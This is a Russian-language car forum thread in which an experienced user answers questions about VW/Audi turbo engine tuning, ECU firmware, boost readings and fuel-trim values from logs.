Показано с 1 по 10 из 646

Тема: Советы от turborabbit`a

Древовидный режим

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    -- тросик и там и там ставился . И на агу и арз .
    ====
    НЕТ.
    арз и аум это электродрочели

Блоки эбу точно разные . Если снять фишку c расходомера , машина будет в аварийном режиме ?
    =====
    Да

Если прошивка не корректная должна не завестись , или по - любому заведется ?
    ====
    Если всё расово православно допилено - заведёцца и будет +/- нормально ехать

Добавлено через 1 минуту
    Цитата Сообщение от Чуйкин Посмотреть сообщение
    Прошивку писал Сергей Никифоров из Питера.. прошивка не копипаст.. он писал ее сам и по России ездит не одна машина с такой турбой и его прошивкой.. Смесь в любом случае при заливки проги будут смотреть по широкой лямбде и корректировать
    ====
    Копипаста будет когда после установки кита машину не повезут к Сергею для НАСТРОЙКИ, а скопипастят готовую прошивку под ТОТ автомобиль/мозг/сетап.

Добавлено через 4 минуты
    Цитата Сообщение от neprinc Посмотреть сообщение
    Кирилл спасибо за быстрый ответ.
    т.е. исходя из моих логов неисправность на лицо?

Я связывался с прадставителями Revo они меня успокоили вот их ответ "Копать никуда не надо, у вас все отлично.
    В наших прошивках всегда заложен потенциал на небольшие доработки, например другая система впуска и т.п., более того, не все машины надувают эти значения даже со всей периферией. Колонку specified следует воспринимать как "ограничитель", нежели как запрос, т.к. наддув выстраивается исходя из регулировки скважности N75 (управляющего клапана) и на этих машинах даже при его 100% открытии на средних оборотах максимальное значение наддува как раз около 1.1-1.2 бара, это можно посмотреть в 118 группе.
    Коррекция у вас также в норме, заводская норма - до 10% в обе стороны. Даже на полностью стандартной машине вы увидите значения 2-4%.
    Также, немаловажный момент - погода, если в жару наддув 1.1-1.2 и коррекция 5-7%, то в более прохладную погоду наддув будет значительно ближе к запросу и коррекция будет поменьше."

Т.е. моя штатная турба должна выдавать запрашиваемые 1.3 избытка?
    а на штатной прошивки я как то мог почувтовать или увидеть по логам что идёт недодув или на штатном надуве тербины и так хватает за глаза даже с такой неисправностью как у меня?
    ====
    Про запрашиваемый наддув и коррекции написали политкорректно, но турба должна дуть больше.
    Моя дула больше по крайней мере в аналогичном сэтапе.
    Яхз может в рашку поставляют скауты с рестриктором какимнить, но версия софта одинаковая
    Последний раз редактировалось turborabbit; 11.08.2012 в 12:23. Причина: Добавлено сообщение
    Запомните и "зарубите на носу" : 2.0TFSI+K03 = max300hp 2.0TSI+IHI = max315hp 2.0T(F)SI+K04 = max400hp :)